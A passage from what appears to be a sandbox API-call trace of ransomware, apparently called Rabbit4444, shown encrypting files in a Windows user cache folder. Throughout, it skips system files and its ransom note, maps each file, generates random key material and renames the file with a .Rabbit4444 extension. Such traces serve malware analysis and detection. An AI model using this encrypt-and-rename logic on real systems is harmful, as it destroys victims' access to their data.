dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.793] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.793] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15910338811) returned 1 [0067.793] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0067.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.793] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.794] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.795] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101d98) returned 1 [0067.795] CryptGenRandom (in: hProv=0x101d98, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0067.796] CryptReleaseContext (hProv=0x101d98, dwFlags=0x0) returned 1 [0067.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.796] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15910685059) returned 1 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0067.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.796] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.796] CloseHandle (hObject=0x29c) returned 1 [0067.796] CloseHandle (hObject=0x280) returned 1 [0067.796] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}.Rabbit4444") returned 156 [0067.796] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{197dfb5f-c4aa-4b34-9390-72c57dc8bff8}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{197DFB5F-C4AA-4B34-9390-72C57DC8BFF8}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{197dfb5f-c4aa-4b34-9390-72c57dc8bff8}.rabbit4444"), dwFlags=0x1) returned 1 [0067.797] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9893f8b9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9893f8b9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", cAlternateFileName="{1E2A2~1")) returned 1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="Rabbit4444.exe") returned -1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2=".") returned 1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="..") returned 1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="windows") returned -1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="bootmgr") returned -1 [0067.797] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="pagefile.sys") returned -1 [0067.798] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="boot") returned -1 [0067.798] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="ids.txt") returned -1 [0067.798] lstrcmpiW (lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", lpString2="NTUSER.DAT") returned -1 [0067.798] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}" | out: lpString1="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}") returned="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}" [0067.798] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}", dwFileAttributes=0x0) returned 1 [0067.798] lstrlenW (lpString="{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}") returned 38 [0067.798] lstrlenW (lpString="Rabbit4444") returned 10 [0067.798] lstrcmpiW (lpString1="C7326097B}", lpString2="Rabbit4444") returned -1 [0067.798] lstrlenW (lpString=".dll") returned 4 [0067.798] lstrcmpiW (lpString1="97B}", lpString2=".dll") returned 1 [0067.798] lstrlenW (lpString=".lnk") returned 4 [0067.798] lstrcmpiW (lpString1="97B}", lpString2=".lnk") returned 1 [0067.798] lstrlenW (lpString=".ini") returned 4 [0067.798] lstrcmpiW (lpString1="97B}", lpString2=".ini") returned 1 [0067.798] lstrlenW (lpString=".sys") returned 4 [0067.798] lstrcmpiW (lpString1="97B}", lpString2=".sys") returned 1 [0067.798] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1e2a2306-c9c1-4028-a5d7-f2ec7326097b}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.799] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.799] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15910938362) returned 1 [0067.799] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.799] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.799] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0067.799] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.800] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.801] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15911205954) returned 1 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0067.801] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.802] CloseHandle (hObject=0x29c) returned 1 [0067.802] CloseHandle (hObject=0x280) returned 1 [0067.802] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}.Rabbit4444") returned 156 [0067.802] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1e2a2306-c9c1-4028-a5d7-f2ec7326097b}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1E2A2306-C9C1-4028-A5D7-F2EC7326097B}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1e2a2306-c9c1-4028-a5d7-f2ec7326097b}.rabbit4444"), dwFlags=0x1) returned 1 [0067.802] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x993d3fe9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x993d3fe9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{238B3853-BA53-44A6-88BA-A0867B43ED76}", cAlternateFileName="{238B3~1")) returned 1 [0067.802] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.802] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.802] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="Rabbit4444.exe") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2=".") returned 1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="..") returned 1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="windows") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="bootmgr") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="pagefile.sys") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="boot") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="ids.txt") returned -1 [0067.803] lstrcmpiW (lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}", lpString2="NTUSER.DAT") returned -1 [0067.803] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{238B3853-BA53-44A6-88BA-A0867B43ED76}" | out: lpString1="{238B3853-BA53-44A6-88BA-A0867B43ED76}") returned="{238B3853-BA53-44A6-88BA-A0867B43ED76}" [0067.803] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{238B3853-BA53-44A6-88BA-A0867B43ED76}", dwFileAttributes=0x0) returned 1 [0067.804] lstrlenW (lpString="{238B3853-BA53-44A6-88BA-A0867B43ED76}") returned 38 [0067.804] lstrlenW (lpString="Rabbit4444") returned 10 [0067.804] lstrcmpiW (lpString1="67B43ED76}", lpString2="Rabbit4444") returned -1 [0067.804] lstrlenW (lpString=".dll") returned 4 [0067.804] lstrcmpiW (lpString1="D76}", lpString2=".dll") returned 1 [0067.804] lstrlenW (lpString=".lnk") returned 4 [0067.804] lstrcmpiW (lpString1="D76}", lpString2=".lnk") returned 1 [0067.804] lstrlenW (lpString=".ini") returned 4 [0067.804] lstrcmpiW (lpString1="D76}", lpString2=".ini") returned 1 [0067.804] lstrlenW (lpString=".sys") returned 4 [0067.804] lstrcmpiW (lpString1="D76}", lpString2=".sys") returned 1 [0067.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{238B3853-BA53-44A6-88BA-A0867B43ED76}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{238b3853-ba53-44a6-88ba-a0867b43ed76}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.804] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.804] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15911497247) returned 1 [0067.804] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0067.804] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.807] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.809] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15911961872) returned 1 [0067.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0067.809] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.809] CloseHandle (hObject=0x29c) returned 1 [0067.809] CloseHandle (hObject=0x280) returned 1 [0067.809] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{238B3853-BA53-44A6-88BA-A0867B43ED76}.Rabbit4444") returned 156 [0067.809] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{238B3853-BA53-44A6-88BA-A0867B43ED76}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{238b3853-ba53-44a6-88ba-a0867b43ed76}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{238B3853-BA53-44A6-88BA-A0867B43ED76}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{238b3853-ba53-44a6-88ba-a0867b43ed76}.rabbit4444"), dwFlags=0x1) returned 1 [0067.810] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9927cac9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9927cac9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{25F897FC-E052-47D8-81FA-058F7D44DB07}", cAlternateFileName="{25F89~1")) returned 1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="Rabbit4444.exe") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2=".") returned 1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="..") returned 1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="windows") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="bootmgr") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="pagefile.sys") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="boot") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="ids.txt") returned -1 [0067.810] lstrcmpiW (lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}", lpString2="NTUSER.DAT") returned -1 [0067.810] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{25F897FC-E052-47D8-81FA-058F7D44DB07}" | out: lpString1="{25F897FC-E052-47D8-81FA-058F7D44DB07}") returned="{25F897FC-E052-47D8-81FA-058F7D44DB07}" [0067.810] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{25F897FC-E052-47D8-81FA-058F7D44DB07}", dwFileAttributes=0x0) returned 1 [0067.811] lstrlenW (lpString="{25F897FC-E052-47D8-81FA-058F7D44DB07}") returned 38 [0067.811] lstrlenW (lpString="Rabbit4444") returned 10 [0067.811] lstrcmpiW (lpString1="F7D44DB07}", lpString2="Rabbit4444") returned -1 [0067.811] lstrlenW (lpString=".dll") returned 4 [0067.811] lstrcmpiW (lpString1="B07}", lpString2=".dll") returned 1 [0067.811] lstrlenW (lpString=".lnk") returned 4 [0067.811] lstrcmpiW (lpString1="B07}", lpString2=".lnk") returned 1 [0067.811] lstrlenW (lpString=".ini") returned 4 [0067.811] lstrcmpiW (lpString1="B07}", lpString2=".ini") returned 1 [0067.811] lstrlenW (lpString=".sys") returned 4 [0067.811] lstrcmpiW (lpString1="B07}", lpString2=".sys") returned 1 [0067.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{25F897FC-E052-47D8-81FA-058F7D44DB07}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{25f897fc-e052-47d8-81fa-058f7d44db07}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.812] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.812] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15912261645) returned 1 [0067.812] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.812] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.812] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0067.812] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.813] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.814] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15912517909) returned 1 [0067.814] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.815] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0067.815] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.815] CloseHandle (hObject=0x29c) returned 1 [0067.815] CloseHandle (hObject=0x280) returned 1 [0067.815] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{25F897FC-E052-47D8-81FA-058F7D44DB07}.Rabbit4444") returned 156 [0067.815] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{25F897FC-E052-47D8-81FA-058F7D44DB07}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{25f897fc-e052-47d8-81fa-058f7d44db07}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{25F897FC-E052-47D8-81FA-058F7D44DB07}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{25f897fc-e052-47d8-81fa-058f7d44db07}.rabbit4444"), dwFlags=0x1) returned 1 [0067.815] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bb5100e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bb5100e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x40518d21, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", cAlternateFileName="{27F05~1")) returned 1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="Rabbit4444.exe") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2=".") returned 1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="..") returned 1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="windows") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="bootmgr") returned -1 [0067.816] lstrcmpiW (lpString1="{27F05FEC-A9C6-4C1E-B218-39AC437A0419}", lpString2="pagefile.sys") returned -1 [0067.816] lstrcmpiW 